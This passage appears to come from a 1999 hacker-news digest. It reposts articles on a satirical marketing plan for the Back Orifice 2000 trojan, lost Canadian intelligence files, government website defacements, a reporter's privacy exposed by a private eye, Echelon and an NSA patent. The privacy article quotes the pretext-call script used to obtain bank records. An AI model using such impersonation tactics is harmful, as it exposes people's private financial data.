http://www.hackernews.com/cons/cons.html
@HWA
15.0 c
~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Space Rogue
Issue one of Camarilla, a new zine with articles on
computers, networking, telephony, humor and
everything in between has been released.
Camarilla
http://camarilla.hektik.org
@HWA
16.0 BO2K Marketing Plan (Very funny reading, check this out)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Dildog
What if Back Orifice 2000 was a commercial product? It
would need a marketing plan. Just how would you
market BO2K to the masses? Adam Penenberg had 5 top
PR firms design a marketing campaign for BO2K, and
some of the ideas are pretty wacky.
Forbes
http://www.forbes.com/columnists/penenberg/
They sure don't make press agents like James Sterling Moran anymore. The
undisputed Master of the Publicity Stunt, Moran, who at 91 recently passed
on to that great File-O-Fax in the sky, reeled off a number of Lucy
Ricardo-like schemes to sop up media attention in his lifetime. According to
his obituary, he once walked a bull through a china shop, sat on an ostrich
egg for 19 days until it hatched and looked for a needle in a haystack.
But Moran's most inspired plan never got off the ground: Flying a midget
over Central Park on a kite. The cops put the kibosh on that, prompting
Moran to quip "It's a sad day for American capitalism when a man can't fly a
midget on a kite over Central Park."
Some publicists believe stunts like Moran's have gone the way of castor oil,
manual typewriters, prohibition and vaudeville, but I think they would go
over well today. (Look at Dennis Rodman or John Wayne Bobbit.) With the
emergence of the Internet there are now thousands of content-starved media
outlets hovering in cyberspace.
With this in mind I decided to ask five top PR firms to design a Moran-like
marketing campaign for a decidedly spooky product: Back Orifice 2000 ("BO2K"
for short, a not so subtle dig at Microsoft's "Back Office"), a software
created by the hacker group Cult of the Dead Cow.
BO2K has many intriguing functions. It can be covertly installed on a
victim's hard drive, then used to control the computer from a remote
location. That way the nefarious hacker could access your E-mail, pull up
your surfing history, rifle through your personal files, trash your system.
But wait! There's more! BO2K also serves as a nifty surveillance tool; it
can automatically turn on microphones and cameras on victims' computers so
you can watch your coworkers without their knowledge.
Another popular remote-access hacker tool called Netbus recently became
commercially available, so I decided to price BO2K competitively: $15, the
same as Netbus.
Here's what the PR tsars and tsarinas came up with:
Worry warts
A huge revenue upside opportunity could be realized if the Cult of the Dead
Cow were to focus on potentially the most lucrative market for its product:
the paranoid corporate executive. As most technology products are targeted
to specific market categories (with resultant product feature-set
tailoring), following is a recommendation for marketing and promotion for
this segment:
Product Name: "CEO's Big Brother"
Product Pricing: $15 per employee, plus free tech-support (from a trusted
third-party vendor).
Feature set: Basic BO2K with spy attachments.
Market: Allows the busy, perpetually paranoid executive the ability to
check on staff on a 24/7 multimedia basis (with remote spy attachments for
audio/video). Works equally well with potentially back-stabbing board
members and pesky competitors.
Strategy/Implementation: Reach audience with multisite live product
launch.
Campaign specifics:
Live demonstrations at all airport shuttle terminals (Boston, NY, DC, LA,
Orange County, SF) with free 30-day trial disks handed out.
Create partnership campaign with large hotel chain (e.g., Hyatt). Product
kit with same trial disks handed to all executive business travelers.
Commission survey with results that will demonstrate the need for remote
monitoring to reinforce product category viability (e.g., "52% of American
workers cite their No. 1 use of the Internet at work as a means of looking for
another job, while only 10% use computers to increase their
productivity..."). Include survey in media kit.
Endorsements: Reach out to high-profile CEOs like Gil Amelio, Mike Ovitz,
Ross Perot, for "if only I'd had this product" testimonials.
Market beta testers' experience as "management success" stories to key
business media publications, pre-launch (timing to hit week of launch).
Post-launch: Have Cult member coauthor book with Donald Trump,
tentatively entitled "Art of the Steal," a blueprint for getting competitive
data (BO2K) and what do with it once you've gotten it. Resultant 15-city
book tour and TV campaign.
--Michelle Zawrotny, Phase Two Strategies, San Francisco
Go viral
Our plan would appeal to the driving factors that, in some combination,
motivate all hackers--the prospect of fame, conquering a challenge, dissing
the establishment and earning the respect of their peers.
To appropriately brand and market BO2K to a retail audience we would employ
a viral marketing campaign (naturally!) to promote and, indeed, exploit
various hacker feats. Under the slogan of "Got Code?" the Cult of the Dead
Cow could sponsor a hacker contest to illustrate the uses of Back Orifice
most effectively.
The best hackers would be eligible for various prizes, including hacker
lifestyle gear (extra-padded chairs, official "Star Trek" paraphernalia),
dinner and a movie with Linus Torvalds (the undisputed king of open source
technologies), and the grand prize: A live cow presented to the lucky winner
at Defcon, the annual hacker convention held in Las Vegas, by the entire
Cult of the Dead Cow, dressed in billowing monks robes with hoods.
The publicity for the contest itself would be equally viral: The Cult could
hack into web sites (with permission so they don't violate the law, although
the public doesn't need to know that) to post its marketing message.
-- Jesse Ciccone and Todd Evans of FitzGerald Communications Inc., San
Francisco office
"You've got BO!"
Here's a PR recipe for BO2K to get on the straight and narrow: Seize the
controversy, play the contrarian, tout a celebrity spokesperson and engage
in some reverse engineering. Timing is crucial. Start the campaign in late
December. With Y2K only days away, concerns about cyber-terrorism and
accidental missile launches will be at a fever pitch.
Members of The Cult of the Dead Cow will rush to the Nation's Capital,
wearing white hats. Speaking from an outdoor press conference in a muddy
Silicon Swamp, i.e. Washington Mall, they will address officials from the
government and private industry and offer to serve as exclusive security
consultants to the American government. We'll be sure to spike the audience
with business celebrities, lawyers from the Department of Justice's
antitrust case against Microsoft and politicians who want to "hip up" their
image. In addition, hacker groupies will be paid to sit Indian-style across
the Capital police barricades and conduct a computer security vigil.
To erect the long-term campaign, Pamela Anderson Lee, wearing a G-string,
will be signed to appear in a rock-video music stream composed and performed
by her mercurial mate, Tommy Lee. In a revealing display of BO2K's spy
attachments, she and her husband will be "caught" fooling around in private
by the BO2K spy cam. When they realize they've been caught, she'll look into
the camera and say, "$15 buys you the BO2K software, tickets for two to
'Takedown', the upcoming film about hacker Kevin Mitnick, plus friend and
family shares in the Cult's upcoming IPO."
Lee will then point proudly to the new tag line pinned on her derri�re:
"You've got B.O.!"
I expect that within a month downloads will shatter all previous records.
--Marco Greenberg, president of NYPR, New York City
White collar control
If I were hired to come up with a publicity campaign for Back Orifice 2000,
I'd pitch the product as the perfect personal security program for the busy
executive. Let's face it: Hackers don't have money; it's the enterprise
market where they could reap rewards.
You have to tailor a message that strikes a chord with high-powered
businesspeople. Relate to their experiences, the fact that they spend much
of their time on the road--moving important documents from laptop to
desktop and back to laptop. Always looking ahead, they sometimes forget to
look behind. I'd make sure they realize that BO2K makes it possible to keep
on top of what's happening back at the office--who's in your office, what
documents they are reading, what people are saying (You have to love those
spy attachments). I'd tell them: As a CEO or CFO, don't you want to know
who's reading through your files while you're out raising more venture
capital? Wouldn't it be good to now whether anyone was in your office when
you weren't there?
With BO2K you can find out--and better still for the power-hungry board
chairman or CEO--take action.
--Lauren Hackett, account supervisor, Middleberg+Associates, New York City</I>
Operation anthrax
To effectively demonstrate the capabilities of Back Orifice 2000 to
journalists, we must have them experience its potential first hand. We
recommend a guerilla media campaign on behalf of the Cult Of The Dead Cow,
which we propose to call "Operation anthrax."
On a to-be-determined date, our agency and "the Cow" would use BO2K to
clandestinely take over the computers of 50 targeted journalists,
representing both the print and electronic mediums. Simultaneously, BO2K
would pirate the surveillance equipment in Federal Reserve Chairman Alan
Greenspan's office and feed the captured video and audio information
straight to selected reporters' desktops, giving them total unabridged
access to the puppeteer of global finance. (We'll call it "The Greenspan
Cam.") Cult members could finish up by discussing BO2K's most powerful
assets via video to a captive journalism audience.
If Operation Anthrax doesn't generate the desired amount of media
penetration, fear not. We would be glad to use BO2K to control the presses
of the top 100 dailies. And isn't that every publicist's dream? To bypass
the journalist completely and place our own story anywhere we want (above
the fold, naturally).
--Dave Quast, Nicki Gladney and Michael Prichinello of RLM Public Relations, New York City
@HWA
17.0 Canada Loses Classified Documents
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by William Knowles
The Canadian Security Intelligence Service has reported
the theft of top secret files from the back seat of an
agent's car. It is believed that the thieves did not know
what they had and just threw the files away. (Hey, lets
not forget about physical security.)
South China Morning Post
http://www.scmp.com/News/World/Article/FullText_asp_ArticleID-19991115030656052.asp
Late Update: 1145EST
This article has a few more details on the above
escapade.
The Toronto Star
http://www.thestar.ca/thestar/back_issues/ED19991113/news/991113NEW07_NA-SPY13.html
South China Morning Post;
Monday, November 15, 1999
NORTH AMERICA TODAY
Top-secret files stolen
from back seat of agent's
car
MURRAY CAMPBELL in Toronto
There are red faces all around at Canada's spy
organisation after top-secret documents were stolen from
the back seat of an agent's car.
In what is being described as the most serious security
breach in 20 years, documents outlining the future plans
of the Canadian Security Intelligence Service (CSIS)
were stolen last month by drug addicts while the agent
was watching an ice-hockey game in Toronto.
The thieves were apparently looking for money when
they saw a briefcase in the car parked outside the arena
where the Toronto Maple Leafs play.
And a police investigation has concluded that the
sensitive documents were later tossed into a rubbish bin
and ended up in a landfill site.
The CSIS, which was formed in 1984, is responsible for
counter-intelligence and counter-terrorism efforts in
Canada.
The agency, which is charged with guarding the
Government's deepest secrets, is extremely embarrassed
by the lapse.
CSIS officials were trying to play down the importance of
the documents, saying they contained no details of
intelligence sources or specifics of operations.
But an agency official was forced to conclude "we
consider the loss of the documents to be a serious matter
of national security".
It is not the first time the CSIS has slipped up. Earlier this
autumn, there were reports that one of its spooks had
posted on the Internet the names and pictures of
Canadian fighter pilots who served in the Balkans war.
In another incident, a computer disc containing the names
of targets of CSIS intelligence probes was found by a
member of the public.
"This is simply a debacle," said Jim Abbott, an MP with
the opposition Reform Party. "We look like we are in
amateur hour."
But even as cartoonists and satirists feasted on the story,
there were warnings that Canada's spy agency was now
seriously compromised. The country is not a specific
target for terrorists but it proximity to the United States
and its open access to banking and telecommunications
make it attractive to terrorist groups.
-=-
Toronto Star;
http://www.thestar.ca/thestar/back_issues/ED19991113/news/991113NEW07_NA-SPY13.html
Spy agencies launch probe after secret document stolen
By William Walker
Toronto Star Ottawa Bureau Chief
OTTAWA - Twin investigations are under way to ensure that
no Canadian Security Intelligence Service officer ever leaves
confidential documents sitting in a public place, officials say.
The probes follow an incident last month outside the Air
Canada Centre in Toronto where three smash-and-grab artists,
described by police as drug addicts, broke into a car and stole a
confidential CSIS operational plan.
The first investigation is being conducted internally by CSIS
itself, said agency spokesperson Phil Gibson.
``Clearly we don't contemplate employees walking around with
these kinds of documents, that's for sure,'' he said in an
interview yesterday.
The CSIS officer whose car window was smashed isn't being
identified by the agency. The person has not been reprimanded
yet, but will be dealt with when the CSIS investigation ends
soon, Gibson said.
The second probe involves the civilian Security Intelligence
Review Committee (SIRC), a watchdog agency that includes
former Ontario premier Bob Rae among its members.
That agency has complete access to CSIS personnel and files
for the purpose of its investigation and is expected to make a
report public which could lead to changes in how such
documents are handled in future.
Gibson said the document stolen was an ``annual operational
report'' but not the agency's annual report to the
solicitor-general.
Asked how detailed the information contained within the
document was, Gibson said: ``It was broad.''
CSIS has now concluded the document is irretrievable. It is
believed the thieves, who were arrested within days, threw a
briefcase containing the papers in a dumpster.
(See? you NEVER know what you'll find in a dumpster these
days, bodies, guns, manuals and secret philez heh... - Ed)
@HWA
18.0 Guilty Plea in Media City Defacement
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by no0ne
18 year old student Edwin Lim Zhaoming pleaded guilty
to 17 charges of breaking into the Mediacity, the
Television Corporation of Singapore's website. The teen,
who renamed the site "Mediashity" last June 15, will be
sentenced at a later date. His accomplice, a 15 year old
Myanmar national was sentenced to 12 months
probation and 100 hours of community service.
The Straits Times
http://straitstimes.asia1.com.sg/cyb/cyb8_1116.html
(404: url not found)
@HWA
19.0 Hong Kong's Department of Highways Defaced
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by no0ne
The web site of Hong Kong's Department of Highways
which originally offers bilingual information and guides
regarding HK's road system was defaced Friday night.
The intruders changed the index page into one with a
white background and three lines of quotes from various
people.
Yahoo News
http://au.dailynews.yahoo.com/headlines/151199/nbtech/942645300-3893108747.html
Monday 15 November 4:55 PM
Hong Kong Highways Department Website Hacked - Update
The director of the Hong Kong Highways Department said that repairs to his
department's Website, which was defaced by hackers on Friday night, would
have to wait until staff arrived for work on Monday morning.
The Website at http://www.hyd.gov.hk , normally offers bilingual
information on Hong Kong's road system including maps, press releases and
other information.
But instead of a helping of Hong Kong highway news, visitors to the site
found a plain white page with three lines of hacker quotes.
When IT Daily contacted Leung on Saturday for comments on the break-in, he
said that he was unaware of the incident and since his office was closed,
the matter would have to wait until "first thing Monday morning."
"The homepage is for general information," said Leung. "If it's down for
one or two days, it will not be a big impact on the public."
However, the site had been repaired within two hours of Leung's comments.
The Highways Department was not the only official body ignoring online
vandalism. On Thursday, a hacker broke into the Chinese Ministry of
Foreign Affairs Website, at http://fmprc.gov.cn/ , and replaced its home
page with several lines of hacker boasts and obscenities. The
defaced site was still online over the weekend.
A day later, on Friday, a Chinese court jailed a hacker for three years
for breaking into the computer system of the Shanghai branch of a Hainan
securities company and manipulating prices. The former employee of trust
firm Shijiazhuang Trust and Investment, Zhao Zhe, 28, was found
guilty of changing stock data so he could profit from two share sales at
artificially inflated prices.
Meanwhile, officials in Singapore have been taking the issue very
seriously. At least two Singapore government Websites were hacked and Web
pages altered last week, causing the sites to be taken offline and
investigators called in.
The Singapore Government Shopfront, at http://shop.gov.sg , was broken
into on Friday, and the Ministry of Law's Integrated Land Information
Service (INLIS) Web site, at http://www.inlis.gov.sg , was hacked into
last Tuesday.
Both sites were quickly taken offline for official investigations.
Officials said that no records or data were compromised. The Singapore
Computer Response Team (SingCERT) is assisting in the investigations and
the Police have been notified.
"The Ministry of Law takes a serious view of this, as hacking is a serious
offense punishable with heavy penalties," said the ministry, in a
statement.
In September, a fifteen year old Singapore boy was sentenced to a year's
probation and 100 hours community service for hacking into the Television
Corporation of Singapore's Website, at http://www.tcs.com.sg , earlier
this year. Although the attack took place in
June, another TCS Website was hacked shortly after, causing government
officials to inform the public that they would not hesitate to punish
such offences.
@HWA
20.0 You Have No Privacy Anyway
~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Adam
Forbes Magazine hired a private eye to gather all the
information he could on one of their reporters. For less
than $500 he legally came up with all of the reporters
financial information, unlisted phone numbers, social
security number, etc... very terrifying. If you have been
wondering what all this privacy hype is about then read
this.
Forbes
http://www.forbes.com/Forbes/99/1129/6413182a.htm
Our reporter dared a private eye to dig up
dirt on him. The results are terrifying to
anybody who worries about prying eyes or
credit card scamsters. What can you do to
protect yourself?
The End of Privacy
By Adam L. Penenberg
THE PHONE RANG AND A STRANGER CRACKED SING-SONGY AT THE OTHER END OF the
line: "Happy Birthday." That was spooky--the next day I would turn 37.
"Your full name is Adam Landis Penenberg," the caller continued. "Landis?"
My mother's maiden name. "I'm touched," he said. Then Daniel Cohn, Web
detective, reeled off the rest of my "base identifiers"--my birth date,
address in New York, Social Security number. Just two days earlier I had
issued Cohn a challenge: Starting with my byline, dig up as much
information about me as you can. "That didn't take long," I said.
"It took about five minutes," Cohn said, cackling back in Boca Raton, Fla.
"I'll have the rest within a week." And the line went dead.
In all of six days Dan Cohn and his Web detective agency, Docusearch.com,
shattered every notion I had about privacy in this country (or whatever
remains of it). Using only a keyboard and the phone, he was able to
uncover the innermost details of my life--whom I call late at night; how
much money I have in the bank; my salary and rent. He even got my unlisted
phone numbers, both of them. Okay, so you've heard it before: America, the
country that made "right to privacy" a credo, has lost its privacy to the
computer. But it's far worse than you think. Advances in smart
data-sifting techniques and the rise of massive databases have conspired
to strip you naked. The spread of the Web is the final step. It will make
most of the secrets you have more instantly available than ever before,
ready to reveal themselves in a few taps on the keyboard.
For decades this information rested in remote mainframes that were
difficult to access, even for the techies who put it there. The move to
desktop PCs and local servers in the 1990s has distributed these data far
and wide. Computers now hold half a billion bank accounts, half a billion
credit card accounts, hundreds of millions of mortgages and retirement
funds and medical claims and more. The Web seamlessly links it all
together. As e-commerce grows, marketers and busybodies will crack open a
cache of new consumer data more revealing than ever before (see box, p.
188).
It will be a salesman's dream--and a paranoid's nightmare. Adding to the
paranoia: Hundreds of data sleuths like Dan Cohn of Docusearch have opened
up shop on the Web to sell precious pieces of these data. Some are
ethical; some aren't. They mine celebrity secrets, spy on business rivals
and track down hidden assets, secret lovers and deadbeat dads. They
include Strategic Data Service (at datahawk.com) and Infoseekers.com and
Dig Dirt Inc. (both at the PI Mall, www.pimall.com).
Cohn's firm will get a client your unlisted number for $49, your Social
Security number for $49 and your bank balances for $45. Your driving
record goes for $35; tracing a cell phone number costs $84. Cohn will even
tell someone what stocks, bonds and securities you own (for $209). As with
computers, the price of information has plunged.
You may well ask: What's the big deal? We consumers are as much to blame
as marketers for all these loose data. At every turn we have willingly
given up a layer of privacy in exchange for convenience; it is why we use
a credit card to shop, enduring a barrage of junk mail. Why should we care
if our personal information isn't so personal anymore?
Well, take this test: Next time you are at a party, tell a stranger your
salary, checking account balance, mortgage payment and Social Security
number. If this makes you uneasy, you have your answer.
"If the post office said we have to use transparent envelopes, people
would go crazy, because the fact is we all have something to hide," says
Edward Wade, a privacy advocate who wrote Identity Theft: The Cybercrime
of the Millennium (Loompanics Unlimited, 1999) under the pseudonym John Q.
Newman.
ou can do a few things about it (see box, p. 186). Give your
business to the companies that take extra steps to safeguard your data and
will guarantee it. Refuse to reveal your Social Security number--the key
for decrypting your privacy--to all but the financial institutions
required by law to record it.
Do something, because many banks, brokerages, credit card issuers and
others are lax, even careless, about locking away your records. They take
varied steps in trying to protect your privacy (see box, p. 187). Some
sell information to other marketers, and many let hundreds of employees
access your data. Some workers, aiming to please, blithely hand out your
account number, balance and more whenever someone calls and asks for it.
That's how Cohn pierced my privacy.
"You call up a company and make it seem like you're a spy on a covert
mission, and only they can help you,"he says. "It works every time. All
day long I deal with spy wannabes."
I'm not the paranoid type; I don't see a huddle on TV and think that 11
football players are talking about me. But things have gone too far. A
stalker would kill for the wealth of information Cohn was able to dig up.
A crook could parlay the data into credit card scams and "identity theft,"
pilfering my good credit rating and using it to pull more ripoffs.
Cohn operates in this netherworld of private eyes, ex-spooks and ex-cops,
retired military men, accountants and research librarians. Now 39, he grew
up in the Philadelphia suburb of Bryn Mawr, attended Penn State and joined
the Navy in 1980 for a three-year stint. In 1987 Cohn formed his own
agency to investigate insurance fraud and set up shop in Florida. "There
was no shortage of work," he says. He invented a "video periscope" that
could rise up through the roof of a van to record a target's scam.
In 1995 he founded Docusearch with childhood pal KennethZeiss. They fill
up to 100 orders a day on the Web, and expect $1 million in business this
year. Their clients include lawyers, insurers, private eyes; the Los
Angeles Pension Union is a customer, and Citibank's legal recovery
department uses Docusearch to find debtors on the run.
Cohn, Zeiss and 13 researchers (6 of them licensed P.I.s) work out of the
top floor of a dull, five-story office building in Boca Raton, Fla.,
sitting in cubicles under a fluorescent glare and taking orders from 9
a.m. to 4 p.m. Their Web site is open 24 hours a day, 365 days a year. You
click through it and load up an on-line shopping cart as casually as if
you were at Amazon.com.
The researchers use sharp sifting methods, but Cohn also admits to
misrepresenting who he is and what he is after. He says the law lets
licensed investigators use such tricks as "pretext calling," fooling
company employees into divulging customer data over the phone (legal in
all but a few states). He even claims to have a government source who
provides unpublished numbers for a fee, "and you'll never figure out how
he is paid because there's no paper trail."
Yet Cohn claims to be more scrupulous than rivals. "Unlike an information
broker, I won't break the law. I turn down jobs, like if a jealous
boyfriend wants to find out where his ex is living." He also says he won't
resell the information to anyone else.
Let's hope not. Cohn's first step into my digital domain was to plug
my name into the credit bureaus--Transunion, Equifax, Experian. In minutes
he had my Social Security number, address and birth date.Credit agencies
are supposed to ensure that their subscribers (retailers, auto dealers,
banks, mortgage companies) have a legitimate need to check credit.
"We physically visit applicants to make sure they live up to our service
agreement," says David Mooney of Equifax, which keeps records on 200
million Americans and shares them with 114,000 clients. He says resellers
of the data must do the same. "It's rare that anyone abuses the system."
But Cohn says he gets his data from a reseller, and no one has ever
checked up on him.
Armed with my credit header, Dan Cohn tapped other sites. A week after my
birthday, true to his word, he faxed me a three-page summary of my life.
He had pulled up my utility bills, my two unlisted phone numbers and my
finances.
This gave him the ability to map my routines, if he had chosen to do so:
how much cash I burn in a week ( $400), how much I deposit twice a month (
$3,061), my favorite neighborhood bistro (the Flea Market Cafe), the $720
monthly checks I write out to one Judith Pekowsky: my psychotherapist.
(When you live in New York, you see a shrink; it's the law.) If I had an
incurable disease, Cohn could probably find that out, too.
He had my latest phone bill ( $108) and a list of long distance calls made
from home--including late-night fiber-optic dalliances (which soon ended)
with a woman who traveled a lot. Cohn also divined the phone numbers of a
few of my sources, underground computer hackers who aren't wanted by the
police--but probably should be.
Knowing my Social Security number and other personal details helped Cohn
get access to a Federal Reserve database that told him where I had
deposits. Cohn found accounts I had forgotten long ago: $503 at Apple Bank
for Savings in an account held by a long-ago landlord as a security
deposit; $7 in a dormant savings account at Chase Manhattan Bank; $1,000
in another Chase account.
A few days later Cohn struck the mother lode. He located my cash
management account, opened a few months earlier at Merrill Lynch &Co. That
gave him a peek at my balance, direct deposits from work, withdrawals, ATM
visits, check numbers with dates and amounts, and the name of my broker.
That's too much for some privacy hawks. "If someone can call your bank and
get them to release account information without your consent, it means you
have no privacy," says Russell Smith, director of Consumer.net in
Alexandria, Va., who has won more than $40,000 suing telemarketers for
bothering him. "The two issues are knowledge and control: You should know
what information about you is out there, and you should be able to control
who gets it."
How did Cohn get hold of my Merrill Lynch secrets? Directly from the
source. Cohn says he phoned Merrill Lynch and talked to one of 500
employees who can tap into my data. "Hi, I'm Dan Cohn, a licensed state
investigator conducting an investigation of an Adam Penenberg," he told
the staffer, knowing the words "licensed" and "state" make it sound like
he works for law
enforcement.
@HWA
21.0 ACLU to Monitor Echelon
~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by turtlex
The American Civil Liberties Union in cooperation with
the Electronic Privacy Information Center and others
has started a program to monitor Echelon. The groups
hope to pressure congress for an investigation into the
global eavesdropping network. (For something that
supposedly doesn't exist - Echelon sure gets a lot of
press.)
Wired
http://www.wired.com/news/politics/0,1283,32586,00.html
ACLU
http://www.aclu.org
EPIC
http://www.epic.org
Echelon Watch
http://www.echelonwatch.org
Wired;
ACLU to Spy on Echelon
by Chris Oakes
3:00 a.m. 17.Nov.1999 PST
The American Civil Liberties Union has focused its eye on an international
electronic surveillance system that allegedly eyeballs regular citizens.
The civil liberties watchdog launched Echelon Watch, a site designed to
prompt governmental investigation into the reality -- and the legalities
-- of a global electronic surveillance system said to be code-named
"Echelon."
"This has gone from X Files material to clear reality," said ACLU
associate director Barry Steinhardt. "I think at this point it's fact that
it exists."
The ACLU created and administers the site in conjunction with the
Electronic Privacy Information Center and the Omega Foundation of Great
Britain, which prepared a report on the issue to the European Parliament.
No US intelligence agency has confirmed Echelon, but Steinhardt believes
there is sufficient evidence to require a congressional investigation.
"I admit that we do not know all the details," Steinhardt said. "But based
on these credible reports, it is plainly very large, and very
sophisticated."
The ACLU bases its position mainly on two reports commissioned by the
European Parliament and a letter written by an Australian intelligence
official, which confirmed aspects of an Echelon-like operation involving
the United Kingdom, the United States, and Australia.
According to reports such as those solicited by the European Parliament,
Echelon is led by the National Security Agency in the United States, in
conjunction with its counterpart agencies in England, Canada, Australia,
and New Zealand.
Such reports paint a picture of an internationally coordinated
surveillance system that intercepts and analyzes global land-based and
space-based communications networks, such as the Internet. Monitoring
operations run by intelligence agencies worldwide are said to catch
everyday telephone, data, cellular, fax, and email transmissions. The
transmissions are then purportedly analyzed for suspect activity -- such
as terrorism -- and handed off to the appropriate government.
-> *By coordinating across national boundaries, governments can monitor each
-> *other's traffic and circumvent laws prohibiting governments from spying on
-> *their own citizens. Echelon reportedly attempts to capture satellite,
microwave, cellular, and fiber-optic communications. The latest in a
trickle of what are often merely suggestions of Echelon-like operations is
a patent issued by the US Patent and Trademark Office to the US National
Security Agency in August for voice-recognition technology. Steinhardt
pointed out that the technology is designed to summarize voice
communications for further examination.
Such technology sounds Echelon-ish -- but then again, it was issued to an
intelligence-gathering agency.
That's partly why the ACLU wants to see the issue taken beyond disparate
reports, theories, and rumors.
"Echelon operates inside this black box -- without judicial supervision,
without public notice," Steinhardt said. "At this point what the ACLU is
asking for is full disclosure of the laws under which Echelon operates --
something the NSA has refused to provide, even to Congress."
The report to the European Parliament said that the United Kingdom used
the Echelon system to spy on charities, including Amnesty International
and Christian Aid.
The United States has never officially acknowledged Echelon's existence.
When approached to discuss Echelon-related developments, the National
Security Agency repeatedly declines comment.
Representative Bob Barr (R-Georgia) earlier this year amended intelligence
legislation in the House of Representatives to require US intelligence
agencies to report on legal standards used in surveillance activities.
The legislation -- which targets the National Security Agency, the Central
Intelligence Agency, and the Department of Justice -- remains in a
House-Senate conference committee awaiting action.
Barr is a former CIA official and US attorney who serves on the House
Judiciary and Government Reform committees. He has accused the NSA of
conducting a "dragnet" of communication and "invading the privacy of
American citizens."
Documents posted at Echelon Watch include the fax image of a letter sent
to an Australian journalist from the Office of the Director of the
Australian Defence Signals Directorate (DSD), Martin Brady.
The operating rules of the Australian agency "do provide mechanisms to
permit DSD to monitor and report foreign communications involving
Australians in some special carefully-defined circumstances," the letter
said. "DSD does cooperate with counterpart signals intelligence
organizations overseas under the UK-USA relationship."
In addition to a collection of such documents related to Echelon, the new
ACLU site will leverage the group's existing site traffic to encourage
public discussion of Echelon's impact on civil liberties. It features
links prompting visitors to urge an investigation to Congress.
"I think it's beginning to be taken seriously in Washington," Steinhardt
said. "It's certainly being taken seriously in other parts of the world. I
think the hearings will be the likely next step."
@HWA
22.0 NSA Gets Patent on Analyzing Speech
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Weld Pond
The National Security Agency has recently been
awarded a patent for a system of automatic topic
spotting and labeling of data. This could assist the
agency in automatically analyzing human speech.
The London Independent
http://www.independent.co.uk/news/Digital/Features/spies151199.shtml
US PTO
http://164.195.100.11/netacgi/nph-Parser?Sect1=PTO1&Sect2=HITOFF&d=PALL&p=1&u=/netahtml/srchnum.htm&r=1&f=G&l=50&s1='5,937,422'.WKU.&OS=PN/5,937,422&RS=PN/5,937,422
London Independant;
This is just between us (and the spies)
The US National Security Agency has patented a
new technology for monitoring millions of
telephone calls, so watch out, it's now even
easier for the spooks to eavesdrop on your
conversations
By Suelette Dreyfus
15 November 1999
The US National Security Agency has designed and patented a new
technology that could aid it in spying on international telephone calls.
The NSA patent, granted on 10 August, is for a system of automatic
topic spotting and labelling of data. The patent officially confirms for the
first time that the NSA has been working on ways of automatically
analysing human speech.
The NSA's invention is intended automatically to sift through human
speech transcripts in any language. The patent document specifically
mentions "machine-transcribed speech" as a potential source.
Bruce Schneier, author of Applied Cryptography, a textbook on the
science of keeping information secret, believes the NSA currently has
the ability to use computers to transcribe voice conversations.
"One of the holy grails of the NSA is the ability automatically to search
through voice traffic. They would have expended considerable effort
on this capability, and this indicates it has been fruitful," he said.
To date, it has been widely believed that while the NSA has the
capability to conduct fully automated, mass electronic eavesdropping
on e-mail, faxes and other written communications, it cannot do so on
telephone calls.
While cautioning that it was difficult to tell how well the ideas in the
patent worked in practice, Schneier said the technology could have
far-reaching effects on the privacy of international phone calls.
"If it works well, the technology makes it possible for the NSA to
harvest millions of telephone calls, looking for certain types of
conversations," he said.
"It's easy to eavesdrop on any single phone call, but sifting through
millions of phone calls looking for a particular conversation is difficult,"
Schneier explained. "In terms of automatic surveillance, text is easier to
search than speech. This patent brings the surveillance of speech
closer to that of text."
The NSA declined to comment on the patent. As a general policy, the
agency never comments on its intelligence activities.
Yaman Akdeniz, director of Cyber-Rights & Cyber-Liberties UK,
warned that with the new patent and a proposed AT&T and BT joint
venture, which will allow US law enforcement agencies to tap the new
communications network: "We might have a picture in which all British
communications are monitored by the NSA."
The revelation of the NSA's patent is likely to cause tensions with the
European Parliament. Over the past two years, the Parliament has
commissioned several reports which examined whether the NSA has
been using its electronic ears for commercial espionage, particularly in
areas where US corporations compete with European and other
companies.
The NSA relies on an international web of eavesdropping stations
around the world, commonly known as Echelon, to listen into private
international communications. The network emerged from a secret
agreement signed after the Second World War between five nations
including Australia, New Zealand, Canada, Britain and the US. Two of
the NSA's most important satellite listening stations are located in
Europe, at Menwith Hill in Yorkshire and Bad Aibling in Germany.
Julian Assange, a cryptographer who moderates the online Australian
discussion forum AUCRYPTO, found the new patent while
investigating NSA capabilities.
"This patent should worry people. Everyone's overseas phone calls
are or may soon be tapped, transcribed and archived in the bowels of
an unaccountable foreign spy agency," he said.
One of the major barriers to using computers automatically to sift
through voice communications on a large scale has been the inability of
machines to "think" like humans when analysing the often imperfect
computer transcriptions of voice conversations.
Commercial software that enables computers to transcribe spoken
words into typed text is already on the market, but it usually requires
the machine to spend time learning how to understand an individual
voice in order to produce relatively error-free text. This makes such
software impractical for a spy agency which might want automatically
to transcribe and analyse telephone calls on a large scale.
It is also difficult for computers to analyse voice conversations
because human speech often covers topics that are never actually
spoken by name. According to the NSA patent application, "much of the
information conveyed in speech is never actually spoken and...
utterances are frequently less coherent than written language".
US Patent number 5,937,422 reveals that the NSA has designed
technology to overcome these barriers in two key ways. First, the
patent includes an optional pre-processing step which cleans up text,
much of which the agency appears to expect to draw from human
conversations. The NSA's "pre-processing" will remove what it calls
"stutter phrases" associated with speech based on text.
Second, the patent uses a method by which a computer automatically
assigns a label, or topic description, to raw data. If the method works
well, this system could be far more powerful than traditional keyword
searching used on many Internet search engines because it could pull
up documents based on their meaning, not just their keywords.
Dr Brian Gladman, former MoD director of Strategic Electronic
Communications, said that while he doubted the NSA had deployed the
patented system yet, the new technology could become a "potent
future threat" to privacy.
"If the technology does what it says � automatically finding and
extracting the meaning in messages with reasonable accuracy � then it
is way ahead of what is being done now," he said.
The best way for people to protect their private communications was
to use encryption, he said. Encryption software programs scramble
data to prevent eavesdropping. "I'm afraid widespread interception is a
